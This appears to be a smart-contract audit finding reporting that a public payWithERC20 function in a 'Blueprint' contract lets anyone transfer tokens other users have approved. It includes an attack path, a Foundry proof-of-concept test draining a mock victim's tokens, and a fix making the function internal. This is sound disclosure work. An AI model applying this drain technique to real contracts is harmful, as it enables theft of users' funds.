Muscular Carrot Armadillo

High

# Any token a user approves to the Blueprint contract can be stolen using the payWithERC20 function

### Summary

Payment tokens or any tokens approved to the Blueprint contract by a user can be stolen by another user using the payWithERC20 function

### Root Cause

The payWithERC20 is declared as a public function and hence can be called by any user.

### Internal Pre-conditions

User must have granted approval to the Blueprint contract prior

### External Pre-conditions

-

### Attack Path

1. User approves Blueprint contract to spend token on their behalf
2. Attacker calls payWithERC20 function providing the approved token's address as the erc20TokenAddress and the vulnerable user's address as the fromAddress with an amount less than the vulnerable user's balance and approval

### Impact

The user suffers a loss of some or all of their tokens.

### PoC

```solidity
function test_drainUsers() public {
        uint256 validTokenAmount = 100 * 10 ** 18;

        
        // mint token to user
        mockToken.mint(address(2), validTokenAmount);

        console.log(mockToken.balanceOf(address(2))); //100e18
        console.log(mockToken.balanceOf(address(1))); //0

        // Approve the blueprint contract to spend tokens on behalf of user
        vm.prank(address(2));
        mockToken.approve(address(blueprint), validTokenAmount);

        //anyone can use payWithErc20 function to steal user's token balance
        vm.prank(address(1));
        blueprint.payWithERC20(address(mockToken), validTokenAmount, address(2), address(1));

        console.log(mockToken.balanceOf(address(2))); //0
        console.log(mockToken.balanceOf(address(1))); //100e18
    }
```

### Mitigation

A simple solution would be to make the payWithERC20 function an internal function